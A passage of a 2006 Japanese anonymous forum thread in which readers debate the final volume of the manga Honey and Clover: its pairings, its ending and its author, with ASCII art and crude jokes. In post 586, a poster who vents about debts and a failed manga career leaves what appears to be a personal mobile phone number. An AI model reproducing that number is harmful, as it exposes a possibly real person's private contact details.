570 :花と名無しさん:2006/09/09(土) 09:39:57 ID:???0
初恋が実ったのってはぐだけ?

571 :花と名無しさん:2006/09/09(土) 10:05:41 ID:???0
森田とはぐがくっつかないのが腑に落ちてない山田に対して
野宮が出した「真山ボタンとリーダー監禁」の例がよく分からん・・・
あの例になぞらえると
「自分は幸せになりたいけど他の大切な人のためにそれを諦める」
って解釈になりそうなんだけどなぁ。
森田とくっつきたいけど、自分が臭から離れたら臭は孤独になっちゃう、
だから森田に走らないの、と。
百歩譲って「リーダー=絵を描くこと」と例えてるんだとしても、
おいおいそれじゃ臭は利用されてるだけかよ、と思っちゃう。
ていうか実際そうなんだけど、その部分が恋愛感情とごっちゃに描かれてるから
わけがわからない。

そして何であんな話ぐらいで山田は泣くわけ?
もういい年した社会人だろ?



572 :花と名無しさん:2006/09/09(土) 10:08:20 ID:???0
泣きたいときは泣かしてやれ

573 :花と名無しさん:2006/09/09(土) 10:11:12 ID:???O
>560 同意。

574 :花と名無しさん:2006/09/09(土) 10:13:22 ID:???0
アフォなんでパートナーがスフィンクスって例えがサパリなんだが

575 :花と名無しさん:2006/09/09(土) 10:18:04 ID:???O
私もあの野宮のたとえまったく見当違いってわけではないにしても
的外れってかピンぼけってかうまいことあらわせてないと思う。

576 :花と名無しさん:2006/09/09(土) 10:32:26 ID:???0
その時 僕は 唐突だけど 静かに はぐと修がいないハチクロが見たい と感じた・・・・・ 

577 :花と名無しさん:2006/09/09(土) 11:28:49 ID:???O
買ってきた
(ノД`゜).゜. なんかせつなあぁ
良かった。
結局バラバラな感じはするが 竹本乙!立派な主役だよお前は
修とはぐのが一緒になる道はいいと思う。
ただ、今は森田とはぐが離れたが、いつか、この2人が再開して一緒に歩むだろう...とか修は思ってる気がする
そう見えて仕方がないらまた切ない
どうだろう?
森田も心が晴れた気がして良かった
山田はようわからんな。

そして真山 最後の最後にもやってくれた。ありがとうwやっぱり君は大嫌いだよ
修とリカ、山田、真山とゆう男に関わって哀れ さよなら真山

578 :花と名無しさん:2006/09/09(土) 11:31:18 ID:???0
>>571
>ていうか実際そうなんだけど、その部分が恋愛感情とごっちゃに描かれてる
そこなんだよな。その辺についての作者に意見を聞きたかった。
べつに極論すれば森田とくっついても修がリハビリと仕事上のパートナーになることだってできなくはないんだし
なんかこういう「カップリング性」と「なんでも恋愛感情(ときには男同士の友情でも)」ってとこが
「所詮同人作家」といわれる所以なんじゃないかな

579 :花と名無しさん:2006/09/09(土) 11:35:18 ID:???O
>>577
こういうこと考える女が男に依存するのだろうか

580 :高橋佳子:2006/09/09(土) 11:44:00 ID:???O
スピッツとシカオ
これが河村隆一だったらどうにかなってますた
私は基地害なんで

581 :高橋佳子:2006/09/09(土) 11:45:42 ID:???O
なんで私が漫画家になれないの!

582 :高橋佳子:2006/09/09(土) 11:48:12 ID:???O
海野がごり押しされなければ私は漫画家になっていたんだ!

583 :高橋佳子:2006/09/09(土) 11:49:07 ID:???O
あひゃあ

584 :高橋佳子:2006/09/09(土) 11:53:24 ID:???O
借金までして状況したのに
コネのごり押しなんつ氏んまえ!

585 :花と名無しさん:2006/09/09(土) 11:57:09 ID:???0
高橋さん、落ち着いて。
一度デビューなさったのですか?
ヤングユーの新人さんだったとか?

586 :高橋佳子:2006/09/09(土) 11:57:29 ID:???O
一度は連載が決まったプロ同然です
私に仕事ください
借金返したいです
08066028109

587 :花と名無しさん:2006/09/09(土) 12:02:18 ID:???O
>>579
なにそれ?
誰が依存すんの?うち?

588 :花と名無しさん:2006/09/09(土) 12:05:41 ID:???O
ウチ女かよ

589 :高橋佳子:2006/09/09(土) 12:09:35 ID:???O
出版社はひどい人間の集まり
洋なしになった人間はボロ雑巾です

590 :高橋佳子:2006/09/09(土) 12:10:48 ID:???O
努力はやめましょう

591 :花と名無しさん:2006/09/09(土) 12:19:06 ID:???O
何かハチクロもデスノも芸術の神様が
これ以上よけいな事すんなって感じですごい怖いよ
きっと芸術の神様は八神月にそっくりなんだろうな
性格最悪だけど、かっこいいとこは1番かっこいいからいわゆるプロには崇拝者が多い
そんなの糞だって言ってしまえるのはきっと素人の方なんだろうな

592 :花と名無しさん:2006/09/09(土) 12:22:22 ID:???0
遅まきながら10巻読みましたが
読みきり多っ

593 :花と名無しさん:2006/09/09(土) 12:24:34 ID:???0
>>591
本人の手から生み出されるモンと、その本人の人格ってのは別だからな。
性格的に合わないけど良い仕事するなぁって人は結構多いと思う。

で、さっき10巻読んだけど最後の電車のトコで不覚にも泣いちゃった。

594 :花と名無しさん:2006/09/09(土) 12:33:47 ID:???0
ところで、星のオペラのドラえもんの「秘密の道具」って何ですか?

595 :花と名無しさん:2006/09/09(土) 12:41:26 ID:???0
暗記パン

596 :花と名無しさん:2006/09/09(土) 12:52:23 ID:???0
>>595
ありがとうございます。
正直、俺は本編より感動した

597 :花と名無しさん:2006/09/09(土) 12:57:35 ID:???0
10巻買った.
2chでは、ぼろくそに叩かれて、これをいいと肯定する人間は
儲けか本人か、まともな判断が出来ないヤツみたいな認定
されていたので、どんなにひどい内容なのかと思ったけど、
全然普通に後味のいい最終回だった。
読み切りもなかなか良かったし。

売れると大変なんだね。

598 :花と名無しさん:2006/09/09(土) 12:59:38 ID:00O0AUWmO
10巻本当に糞だったし花本先生に生理的嫌悪感すらおぼえたけど
「空の小鳥」とかいう読み切りはかなり好きだ。
6年前のものらしいからやっぱり才能(あったとしたら…)が枯渇したのかな

599 :花と名無しさん:2006/09/09(土) 13:04:05 ID:???0
>>598
どう糞なのかろか才能の枯渇とかよう分からんけど、
「連載を描く能力」と「読みきりを描く能力」は別なんじゃない?
描いてる内にメンタルの変化で話の筋が変わってくる事もあるだろうし…。

最初に最後までのプロットを用意して、何年もの連載でそれをブレさせないままで
描き続けられれば、最初を読んで気に入った読者にも最後まで受け入れられるとは
思うけど。描く側からすればそうも行かないだろうしね。

600 :花と名無しさん:2006/09/09(土) 13:14:28 ID:???0
結末への持っていきかた、無茶をすると思ったけど破碇はしてないと思った。
話題作ということで読み始め最後まで付き合って
ウミノの性格とハチクロ住人達とは肌が合わないと感じた。
面白い・面白くなりそうな部分が多かっただけに残念……
短編は良かった。

601 :花と名無しさん:2006/09/09(土) 13:18:04 ID:???0
いやあ星のオペラよかった

602 :花と名無しさん:2006/09/09(土) 13:26:02 ID:???0
>>597
ひどいと思って読んだらそんなもんだよ。

603 :花と名無しさん:2006/09/09(土) 13:32:42 ID:???0
竹本って7巻で既に振られてたんだな・・・
8巻以降は他の登場人物の伏線消化だったのか?

604 :花と名無しさん:2006/09/09(土) 13:49:43 ID:???O
2〜8までは真山の回収です
9 10ではぐ 森田 修です

605 :花と名無しさん:2006/09/09(土) 14:25:01 ID:???0
短編いらないからもっとじくり描いて欲しかった。
最終回だけは感動したけど
修ちゃんがいつから家族愛から異性への愛に変わっていたのかがわからないので
おいていかれた気持ち。
そこをしっかり描いてくれたら修ハグ納得いったかも。
山田はもーいいや。

606 :花と名無しさん:2006/09/09(土) 14:35:36 ID:xvbsyG2/0
修はいくらなんでも急にでしゃばり過ぎ

607 :花と名無しさん:2006/09/09(土) 14:43:02 ID:???0
>>606
はぐと一番付き合いが長いのはやっぱ修だし、はぐの
一番深いところに踏み込んでるのも修。

で、逆もまた然りで。

608 :花と名無しさん:2006/09/09(土) 14:45:35 ID:???0
ふと
同人系カップリングかと
はぐ×修

609 :花と名無しさん:2006/09/09(土) 14:48:01 ID:???O
ハチクロ以外の商業紙掲載の羽海野作品って
今回の2つ以外いくつくらいあるの?

読んだことあるのは
バレリーナと高校球児の話(スピカ?)と
登場人物が犬だったか熊だったかみたいのが
ウミノクマみたいな感じに擬人化されてるやつで
偏屈ジジイ博士と奥さんの話の2つだ。
(後者はシリーズもの?)
スピンオフとともにまとめてコミクスでだしてほしいな。

610 :花と名無しさん:2006/09/09(土) 14:50:38 ID:???O
次回作の将棋だか囲碁だかの話はどの雑誌掲載予定?青年誌?

611 :花と名無しさん:2006/09/09(土) 14:54:37 ID:xvbsyG2/0
>>607
だからそれをもっと前から描写するべきで
急にあんな形になっても納得できるわけがない

612 :花と名無しさん:2006/09/09(土) 15:08:54 ID:kzdJPRa7O
>>609
コミックキューで短編描いてたけどそういうのもアリ??

613 :花と名無しさん:2006/09/09(土) 15:11:40 ID:???0
ここでのレスを見ると修は作者のお気に入りらしいけど
そうは思えなかった。
他のキャラの内面は細かく描写されていたけど修はなし。
なんだか森田はぐへのあてつけっていうか当て馬みたいな感じ。
最終回ではぐは森田の部屋のモニターをいとおしそうに見ているし。
飲み屋と同じ位置?
飲み屋も初期設定とまったく違って理由もなく山田一直線だし
山田も初期設定とまったく違うから丁度いいのかな?

614 :花と名無しさん:2006/09/09(土) 15:13:04 ID:???O
あ、ゴメン。既出だったみたいね
10巻まだ買ってないから買ってくるわ

615 :花と名無しさん:2006/09/09(土) 15:16:36 ID:???0
森田は日本画学科は辞めちゃうの?

616 :花と名無しさん:2006/09/09(土) 15:24:31 ID:???0
>>613
修萌えの原因についてはさんざん外出なわけだが

617 :花と名無しさん:2006/09/09(土) 15:28:13 ID:IgTPUDHn0
森田が一番好きだったからもう今のハチクロ見たくない。

618 :花と名無しさん:2006/09/09(土) 15:42:35 ID:???0
>>615
8年かけるから大丈夫w

619 :花と名無しさん:2006/09/09(土) 15:43:17 ID:???0
これだけは書き込みたい
    10巻、感動した。

620 :花と名無しさん:2006/09/09(土) 15:43:27 ID:???0
ウミノさんって何歳なの?

621 :花と名無しさん:2006/09/09(土) 15:43:55 ID:???0
>>618
帰国する度に顔出して老人達を恐怖に陥れるんだよなw

622 :花と名無しさん:2006/09/09(土) 15:47:17 ID:???0
遠くに逝った竹本をおいて今年も行われるジャイアンリサイタルwww

623 :花と名無しさん:2006/09/09(土) 15:59:17 ID:???0
>>616
うん。だからここ先に見てて作者が修萌えだっていうから
どんだけ作品に出ているのかと思ったら
あつかいはテキトーだったから納得いかなかっただけ。


624 :花と名無しさん:2006/09/09(土) 16:03:56 ID:???O
>612
ありでおながいします。マイナー雑誌でも自費出版、二次創作じゃなきゃいい。

でもコミクスにはまとまんないか。出版社の壁あるもんな。

625 :花と名無しさん:2006/09/09(土) 16:05:33 ID:???0
>>623
そのテキトーな描写しかない修がはぐがといきなりくっついたことが
その萌えを証明しているとは思わなかったの…?
最初から修に萌えてたならもっと伏線張っただろうから
ここまで言われなかっただろうよ

626 :花と名無しさん:2006/09/09(土) 16:09:23 ID:???O
>>607
無理矢理

627 :花と名無しさん:2006/09/09(土) 16:11:02 ID:???0
序盤から続いていた修の"はぐLOVE"は伏線ではないと?

628 :花と名無しさん:2006/09/09(土) 16:11:30 ID:???O
>>619
だから?

629 :花と名無しさん:2006/09/09(土) 16:12:27 ID:???O
>>627
何言ってんだこいつ
無理矢理擁護する儲カコワルイ

630 :花と名無しさん:2006/09/09(土) 16:14:49 ID:???0
>>627
序盤からあれがマジ恋愛なら修の評価はますます地に落ちますが、何か。

631 :花と名無しさん:2006/09/09(土) 16:14:52 ID:???0
>>629
とアンチが申しておりますw

632 :花と名無しさん:2006/09/09(土) 16:15:34 ID:???0
1巻から読み返してるけど、
最初から修が恋愛の輪に入る予定だったとは思えない
俺は部外者ナノカー!みたいなとこあったしね。

はぐに小鳥のブローチ作ったり森田いい奴だったな。
竹本は見て知っていたのになんであんな言葉がでてくるんだろう

633 :花と名無しさん:2006/09/09(土) 16:18:30 ID:???0
修の描写不足はさすがに擁護できんだろう
ハチクロが途中で方向変換したのは普通に読んでてもわかるし

初期の修は森田へのはぐの恋心を認めていて
本気嫉妬するんじゃなくていつか森田なり誰かにはぐを渡す覚悟したちゃんとした保護者だった
それがいつのまにかはぐに恋愛感情持ってることにされたから
その過程がなくて読者だけじゃなく山田すら唖然としたんじゃないか

634 :花と名無しさん:2006/09/09(土) 16:25:58 ID:JtCCtp61O
>>631
遠吠えイタス

635 :花と名無しさん:2006/09/09(土) 16:39:49 ID:???0
    _____
   /二二ヽ
   ||・ω・||  < おまえらマンガの結末くらいで
.  ノ/  />
  ノ ̄ゝ       熱くなるなよな
    _____
   /二二ヽ
   ||・ω・||  < おまえらマンガの結末くらいで
.  ノ/  />
  ノ ̄ゝ       熱くなるなよな

636 :花と名無しさん:2006/09/09(土) 16:40:05 ID:???0
>>633
山田さんは【はわわ〜はわわ〜】って言って半分喜んでたけどね…
真山もいきなり出てきて応援してるしまわりもなんか青春応援モード☆って
感じだったし何だったんだあれは…って感じだった。

どうして関係ない爺さんまで修ちゃんにエールを送ってるんだ( ;´_ゝ`)
こういうノリ嫌いではないけど話の流れも強引だったのが手伝って、
ものすごい違和感があったなあ。

637 :花と名無しさん:2006/09/09(土) 16:41:54 ID:???0
はぐ修に関して言えば、そして振り出しに戻る、って感じ。
というか、あの最終回は前から決まってたんでしょ。
だってどこにでも入れられるよ。
だから文句なく誰でもちょっとはうるっとできる。

638 :花と名無しさん:2006/09/09(土) 16:43:05 ID:???0
>>637
おまえ…

639 :花と名無しさん:2006/09/09(土) 16:43:15 ID:???0
>>632
竹本は修はぐ展開のある意味犠牲者というか汚れ役だよ
竹本に森田を否定させることで
森田ははぐにふさわしくないということを説明してる
自分探しして一回り成長する前ならともかく
成長した後の竹本にああいうセリフ言わせるのは微妙だったな

640 :花と名無しさん:2006/09/09(土) 16:44:04 ID:???0
脳内補完がお上手な人がきているみたいですね
以後スルー推奨

641 :花と名無しさん:2006/09/09(土) 16:46:54 ID:???O
このスレは腐ってる
いいと思うならそれでOK
嫌な展開だと思うならそれでOK
どっちも いちいち反応すんな

642 :花と名無しさん:2006/09/09(土) 16:48:19 ID:???0

          ____
       / \  /\  キリッ
.     / (ー)  (ー)\
    /   ⌒(__人__)⌒ \   
    |      |r┬-|    | どっちも いちいち反応すんな
     \     `ー'´   /
    ノ            \
  /´               ヽ
 |    l              \
 ヽ    -一''''''"~~``'ー--、   -一'''''''ー-、.
  ヽ ____(⌒)(⌒)⌒) )  (⌒_(⌒)⌒)⌒))


     ,;r'"´;;;;;;;;;;;;;;;;;;;;;;;;;;`ヽ、
    ,r'";;;;:::::;彡-=―-=:、;;;;;;ヽ、
   /;;ィ''"´  _,,,,....ニ、 ,.,_ `ヾ;;;;〉
    `i!:: ,rニ彡三=、' ゙''ニ≧=、!´  屋上へ行こうぜ・・・・・・
   r'ニヽ,   ( ・ソ,; (、・')  i'
    ll' '゙ ,;:'''"´~~,f_,,j  ヾ~`''ヾ.  久しぶりに・・・・・・
   ヽ) , :    ''" `ー''^ヘ   i!
   ll`7´    _,r''二ニヽ.     l  キレちまったよ・・・・・・
   !:::     ^''"''ー-=゙ゝ    リ
   l;:::      ヾ゙゙`^''フ    /
   \       `゙’゙::.   イ
    ノ            \
  /´               ヽ
 |    l              \
 ヽ    -一''''''"~~``'ー--、   -一'''''''ー-、.
  ヽ ____(⌒)(⌒)⌒) )  (⌒_(⌒)⌒)⌒))

643 :花と名無しさん:2006/09/09(土) 16:48:30 ID:???0
    _____
   /二二ヽ
   ||・ω・|| 
   ノ/  />
  ノ ̄ゝ  

644 :花と名無しさん:2006/09/09(土) 16:48:57 ID:???0
方向転換は感じるな。だが後半は割りと一貫してると思う。

最後まで恋愛は何だか上手く噛み合わない、という事に終始した感。
単純にハッピーエンドでは終わらず、人生は続いていく。
妥協と諦観、その中のわずかな前向きさ。


続編(ハチクロ2みたいなのね)を描かなければ、という条件で俺はこのエンディングを支持します。

645 :花と名無しさん:2006/09/09(土) 16:52:42 ID:???0
方向転換感じる時点で駄目なんじゃないかなと個人的には思う
それを感じさせないフォローをプロならして欲しかった

でも支持するしないは自由なので別にいいと思うよ

646 :花と名無しさん:2006/09/09(土) 16:53:46 ID:???0

         そんなことよりインベーダーゲームしようぜ!

                    -=-

              典 典 典 典 典 典
              典 典 典 典 典 典
              典 `,:、 .典 典    典
                        !
              凹 i 凹  凹  凹  凹

                凸



647 :花と名無しさん:2006/09/09(土) 16:58:41 ID:???O
竹本は森田の家庭事情を知らなかったんだよな?
知っててあんな風に言ってたならさすがに軽蔑するけどさ。
でもあんな台詞は言って欲しくなかったな。竹本が好きで読んでた身としては。

648 :花と名無しさん:2006/09/09(土) 17:03:24 ID:???0
修はぐのカップリングに説得力をもたせるために
周囲のあちこちに、今までなかったような性格設定とか言葉(=解説)を
入れてるところが強烈な違和感なんだよ。
なんでそこまでして無理矢理くっつけようとしたのかが疑問。
紙面はまだまだあったし、連載打ち切る要素はゼロだったのに。

649 :花と名無しさん:2006/09/09(土) 17:06:15 ID:???O
スピンオフで修が主役になる可能性もあるのかな?
納得いかない内容だったら、後付け!って怒る人もいそうだが。

浜田山のパン屋の兄ちゃんの話って何スレか前で読んだけど、それってFA?

650 :花と名無しさん:2006/09/09(土) 17:07:07 ID:???0
10巻読んだけど思ったより全然良かった。
何でこんなに叩かれてるのかがわからん。
9巻の事故はあからさまに終らせる感があったが
少女マンガの王道的な終わりじゃね?
それぞれ自分で進む道決めて未来がありそうな終わりだし。

最後に理加が来た意味は全くわからん。
ラストにむりやり全員集合って感じがする。

野宮と山田のやりとり(64話)と
サンドイッチの中身がまともで良かった。
サンドイッチはラストにまたボケがくるかとも思ったけど。


651 :花と名無しさん:2006/09/09(土) 17:11:47 ID:???0
えっ、あれはボケじゃないのか・・・

652 :花と名無しさん:2006/09/09(土) 17:16:25 ID:Nq95F8p+0
話が進むにつれて新鮮さがなくなっていく感じがした

653 :花と名無しさん:2006/09/09(土) 17:19:22 ID:???O
>>640
アテクシの8黒はこうであって欲しい…いや絶対こうだ!という願望だよ

>>637
脳内補完乙

654 :花と名無しさん:2006/09/09(土) 17:20:35 ID:JtCCtp61O
>>647
作者はあれで青春させたつもりじゃね?

655 :花と名無しさん:2006/09/09(土) 17:22:31 ID:???O
>>650
まとも…?



(゚д゚)

656 :花と名無しさん:2006/09/09(土) 17:23:12 ID:???O
>650なんでわからないのか言えばいいのにね

657 :花と名無しさん:2006/09/09(土) 17:48:37 ID:???O
まぁ 改めて読んだら森田もかわいそうかな って思ったな
いい終わりか 悪い終わりかは 人それぞれの判断だな これは

658 :花と名無しさん:2006/09/09(土) 17:58:15 ID:???0
こういう不安定なあいまいな終わり方も
いわゆるひとつの甘酸っぱい青春みたいな



659 :花と名無しさん:2006/09/09(土) 18:00:59 ID:???0
結局完全に幸せな人いなくね?
みなどこかかわいそう

660 :花と名無しさん:2006/09/09(土) 18:03:16 ID:???0
>>658-659
エンディングテーマはスガシカオ「黄金の月」で。

661 :花と名無しさん:2006/09/09(土) 18:45:53 ID:???0
真山は幸せだと思うけど

662 :花と名無しさん:2006/09/09(土) 18:57:35 ID:???O
ストーキングの努力が報われたからね

663 :花と名無しさん:2006/09/09(土) 19:02:01 ID:???0
真山ってリカさんとケコーンすんのか?
リカさんの一番変わらんだろ?

664 :花と名無しさん:2006/09/09(土) 19:45:27 ID:???0
10巻立ち読みしたけど・・・うーん。
竹本の視点で見れば、話は綺麗に完結しているかも。

でもいろいろメルヘン入ってて、客観的に見て(読者として見て)
痛い点がいっぱいあった。
例えば、くっついたカップル。集はぐや真山りかとか・・。
親類だったり、年齢離れている挙句ストーキングだし。
そういった意味で、この漫画からは「同人」っぽい匂いがした

665 :花と名無しさん:2006/09/09(土) 19:55:47 ID:???0
>>658
そうそう。
「うまくいかなくて悩み苦しむ。それが青春」
みたいなことが描きたかったのかなぁ。ウミノさんは。

穿った考え方をすれば、順調にストーリーが進めば森はぐエンドだったのに
作者自身が森はぐの恋愛をどう描いていいか困って
無難に描ける修はぐに逃げたんじゃ…と思う。

666 :花と名無しさん:2006/09/09(土) 19:57:06 ID:???0
アニメ版で言うと1だけでいいな
2はイラネ

667 :花と名無しさん:2006/09/09(土) 19:57:37 ID:???O
なんでそんなに 森はぐにしたいの?

668 :花と名無しさん:2006/09/09(土) 19:58:04 ID:Gsi1KCxu0
ミドリちゃんをもっと出してほしかった(???д?)??ワシャー

669 :花と名無しさん:2006/09/09(土) 19:58:44 ID:???0
>>485
ありえるなそれw

670 :花と名無しさん:2006/09/09(土) 20:02:36 ID:???0
今日の10巻買うの忘れた

671 :花と名無しさん:2006/09/09(土) 20:06:11 ID:/hUHdykg0
ハチクロすごい好きだったんだけどなあ・・・
すっごい感動したのに・・・
ウミノさんオチが思いつかなかったんでしょ?
だからこんなめちゃくちゃにしたんだね。


672 :花と名無しさん:2006/09/09(土) 20:08:35 ID:???O
>>667
森はぐとかそんなんじゃなくて
不自然なくっつけ方や離し方につっこみ入れてんだよ

673 :花と名無しさん:2006/09/09(土) 20:10:39 ID:???0
マンセー意見よりそうでない意見の方が単純に目立つだけ
ただ「よかった」より「ここが気に入らない」のほうが書きやすいだろし

でも本編最終話の時のここよりも今の方が落ち着いたレス多くてまだいいや


674 :花と名無しさん:2006/09/09(土) 20:11:21 ID:???O
>>671
最初にラストまで決めてるとは言ってたけど
後々にスピッツの歌(魔法のコトバ)聴いてラスト変えたとか
YUKIとの対談でラストに描くことがわかったとか
とにかくマスコミアピールが禿しくて…

675 :花と名無しさん:2006/09/09(土) 20:12:52 ID:???O
あの時のお祭りは凄まじかったな……
スレの速度も内容も

676 :花と名無しさん:2006/09/09(土) 20:16:41 ID:???0
まあ、
苦いラストを予測してた人は多かったけど(少なくとも竹本は報われない。オーケンも苦いラストになるんじゃないかと言ってたね)、
痛いラストになるとはなあ。

どう言い訳しても臭の台頭は唐突すぎるでしょ。

はぐ、森田、竹本の誰も結ばれないのは良いけど、
臭の出しゃばりだけは意味不明だった。

677 :花と名無しさん:2006/09/09(土) 20:17:00 ID:???O
今日10巻買ったんだがびびった
絵がいつも異常にメルヘンで細かくて見づら…
それにしゅうがハグ好きだったことに衝撃を受けた。キモイ_| ̄|○
森田や竹本がいた意味わかんね。ただの当て馬かよ
別に誰かと無理矢理くっつけなくたってよかったじゃん
はぐが依存症かだらしない女にしか見えない

678 :花と名無しさん:2006/09/09(土) 20:22:40 ID:???O
少女マンガを書うのは これが最初で最後かな....多分

679 :花と名無しさん:2006/09/09(土) 20:43:54 ID:???0
表紙が今までで一番好きじゃない

680 :花と名無しさん:2006/09/09(土) 20:45:54 ID:???O
このモヤモヤ感は必ずしも修はぐのせいだけじゃない気がする

681 :花と名無しさん:2006/09/09(土) 20:47:40 ID:???0
私も表紙やだ

682 :花と名無しさん:2006/09/09(土) 21:00:07 ID:???0
ハチクロ10巻のアマゾンカスタマーズレビュー、マンセー意見ばっかり。
(一人アンチ意見の人がいるけど説得力のない文だったし)
http://www.amazon.co.jp/%30cf%30c1%30df%30c4%3068%30af%30ed%30fc%30d0%30fc-10-10/dp/4088653580/sr=1-22/qid=1157802986/ref=sr_1_22/503-6030830-3277777?ie=UTF8&s=books

683 :花と名無しさん:2006/09/09(土) 21:03:41 ID:???0
10巻の表紙、頭身とかカラダのバランスが変な感じがする

684 :花と名無しさん:2006/09/09(土) 21:05:09 ID:???0
表紙、なに? これからみんなで青春(観覧車)に逆行しようっての?

やっぱ10巻はマン喫に流れたときに読むだけでいーや

685 :花と名無しさん:2006/09/09(土) 21:10:55 ID:???0
メイン5人一緒のイラストって、
大抵森田と山田がイチャイチャしてるよね…。
漫画読んだことなくて、ハチクロの絵だけ見たことあった時は
森田と山田が恋人同士だと思ってた。

実際に漫画を読んでみて
森田と山田はただの友情だとわかった今は
メイン5人一緒のイラストで森田と山田が手をにぎってたり
くっついてる描写にはすごく違和感を感じる。

686 :花と名無しさん:2006/09/09(土) 21:14:58 ID:???0
山田も森田と付き合っていれば鉄人のままいられたのに、惜しい

687 :花と名無しさん:2006/09/09(土) 21:24:33 ID:???0
>>663
つめぞん一刻

688 :花と名無しさん:2006/09/09(土) 21:26:07 ID:???0
山田は真性ロリコンだし
森田はメガネ男にしか萌えないので
二人の恋愛はムリぽ。

アメリカでょぅじょを見てはぐみを思い出して
仕事ほっぽりだしてはぐみに会うために日本に帰ったり
「パイナポー、ふしぎな実ー♪」と歌ってるょぅじょを見て
はぐみを思い出して、ょぅじょと同じ帽子を買って
はぐみにかぶせたりするような男ですよ?

689 :花と名無しさん:2006/09/09(土) 21:26:18 ID:???0
>>632
竹本だって、ゲロ吐きそうなはぐの世話してやったり
家具作ってやったりいい奴だったぞ。

690 :花と名無しさん:2006/09/09(土) 21:27:21 ID:???0
>>688
山田と森田が入れ替わってるw

691 :花と名無しさん:2006/09/09(土) 21:29:15 ID:???O
>>685
サントラのジャケットイラストも手繋いでる

692 :688:2006/09/09(土) 21:29:25 ID:???0
>>690
ホントだ。
あなたの指摘を読むまで素で気付かなかったよ。
間違ってスマン。

693 :花と名無しさん:2006/09/09(土) 21:29:55 ID:???0
狂ったか

694 :688:2006/09/09(土) 21:30:40 ID:???0
ょぅじょの「じ」を小さい字で出すにはどうやって入力したらいいの?

695 :花と名無しさん:2006/09/09(土) 21:33:28 ID:???0
>>694
「イオタ」(ギリシャ文字)

696 :花と名無しさん:2006/09/09(土) 21:34:49 ID:???0
なぜ規格をやぶってまで小さい字で打ちたがるの?

697 :花と名無しさん:2006/09/09(土) 21:34:58 ID:???O
ょぅι゙ょ

698 :花と名無しさん:2006/09/09(土) 21:35:34 ID:???0
>>696
ようじょ、だと幼い感じが出ない

699 :688:2006/09/09(土) 21:39:25 ID:???0
ありがとん



700 :花と名無しさん:2006/09/09(土) 21:39:39 ID:???0
10巻読んだ
竹本がもっと嫌いになった

701 :花と名無しさん:2006/09/09(土) 21:40:08 ID:???0
とりあえず最後の宴に登場すら出来なかった森田がかわいそうだと思った

702 :花と名無しさん:2006/09/09(土) 21:40:23 ID:???0
山田も森田も臭もロリコン。

703 :花と名無しさん:2006/09/09(土) 21:42:27 ID:???0
竹本も森田も 一 応 同じ大学生だったわけでっ

704 :花と名無しさん:2006/09/09(土) 21:45:00 ID:???0
竹本はりっちゃんみたいな気のいいかわいい彼女とくっつくよ。
森田はカオルがあてがってくれた金髪グラマーの家政婦さん(初期やまだ風)に
栄養管理で追いかけられてラブラブ鬼ごっこ。

そんで修は早死にしてはぐは路頭に迷う。

705 :花と名無しさん:2006/09/09(土) 21:45:01 ID:???0
真性ロリ男にははぐは人気ないよ。
真性ロリ男には
「実際の年齢が14歳以下の美少女や美幼女」は人気あるけど
「見た目は幼女だが、実際の年齢は成人女」なんて眼中にない。
しかもはぐみは男に欲しかったものをプレゼントされて
「ありがとう」も言えないくらい性格も悪いし。
親に躾された良い子の幼女は「ありがとー」って言葉をちゃんと言えるぞ。

706 :花と名無しさん:2006/09/09(土) 21:45:46 ID:???0
>>704
森田はキンパツグラマーでは起(た)ちません

707 :花と名無しさん:2006/09/09(土) 21:47:59 ID:???0
小さくても年取ってるとそれなりに肌は老化してるし
手足はでかいし骨格がっしりしてるよな

708 :花と名無しさん:2006/09/09(土) 21:48:56 ID:???0
>>706
吸ってくれるから大丈夫

709 :花と名無しさん:2006/09/09(土) 21:50:16 ID:???O
小人さんとか小さいけど外見はしっかり加齢するし

710 :花と名無しさん:2006/09/09(土) 21:51:02 ID:???0
小さいばあちゃんとかって手がでかくて吃驚するときあるよね。

711 :花と名無しさん:2006/09/09(土) 21:53:21 ID:???0
やっぱり友達って学生時代に作るもんだね!
気付くのがおそかった。。。

712 :花と名無しさん:2006/09/09(土) 21:53:29 ID:???0
森田は恋じゃなくメルヘン萌えなのでは

とゆーか、ことごとくキャラが誰かを「なんで好きか」というのを描けないよね、
ウミノさん。修→はぐのきっかけも結局なんにも描けてないからおかしくなった

713 :花と名無しさん:2006/09/09(土) 21:54:29 ID:???0
キモオタは女の実年齢をすごく気にするから本当に>>705の言うとおりかも。

714 :花と名無しさん:2006/09/09(土) 21:55:54 ID:???0
真性ロリは若芽や初鰹を愛する日本人の鑑

715 :花と名無しさん:2006/09/09(土) 21:58:09 ID:???O
>>713
そういう人って特に30の女をババアと嫌悪するしねwww

716 :花と名無しさん:2006/09/09(土) 22:05:09 ID:???O
チョコの話さ〜 真山達のは一応 アレンジしてあるが
先生のは 商品のまんま渡されてるんだよなw

717 :花と名無しさん:2006/09/09(土) 22:06:44 ID:???0
そういえば20年来の友人がウザくなったので縁切った
散々我慢してきたがもう限界だ
自分に都合がよく調子のいい野郎だった

718 :花と名無しさん:2006/09/09(土) 22:17:23 ID:???0
>>717
そういえばって何が?ゴバク?

719 :花と名無しさん:2006/09/09(土) 22:20:28 ID:???0
20年来の友人てw
いい年なのにそんなもんなのかw

720 :花と名無しさん:2006/09/09(土) 22:25:19 ID:???0
>>718
青春ネタみたいなもんだろ

かくいう俺も一昨年中学からの友人と絶交したな
てめぇの臆病さを棚に上げて、逆切れして、罵詈雑言を浴びせられた
今思い出してもむかつくわ・・・共通の友達に俺がもう怒ってないか探ってるらしい
堂々とてめぇでくればいいのにホンマ女々しいやっちゃ

721 :花と名無しさん:2006/09/09(土) 22:29:08 ID:???O
うみのも同人時代の知り合いを怒らせてないかな

722 :花と名無しさん:2006/09/09(土) 22:39:27 ID:qbBNOsmXO
あのさ
僕たちチラシの裏って知ってるかなー?
おまえらの私情なんか興味ねーよ^^

723 :花と名無しさん:2006/09/09(土) 22:50:50 ID:???0
シュウちゃんっていつからハグを女として見てたの?
イキナリでビックリしたんですけど
読み飛ばした巻ないはずなのに

724 :花と名無しさん:2006/09/09(土) 22:52:07 ID:???0
病的にはぐを呼ぶモンゴルあたりからでいいんじゃまい

725 :花と名無しさん:2006/09/09(土) 23:15:35 ID:???0
モンゴルは遊牧民族。蒙古(もうこ)。現在のモンゴル国と中華人民共和国の内モンゴル自治区
をあわせたものにほぼ一致する地域、モンゴル高原を中心に、内陸ユーラシアに居住する。
モンゴル諸語のモンゴル語を母語とする。人口は、モンゴル国に約253万3,100人(2004年統計年鑑)、
中国に約1000万人であるが、中国内のモンゴル人は牧畜を行わず都市に居住する割合がかなり
多く、モンゴル語を話せなくなった人も少なくない。
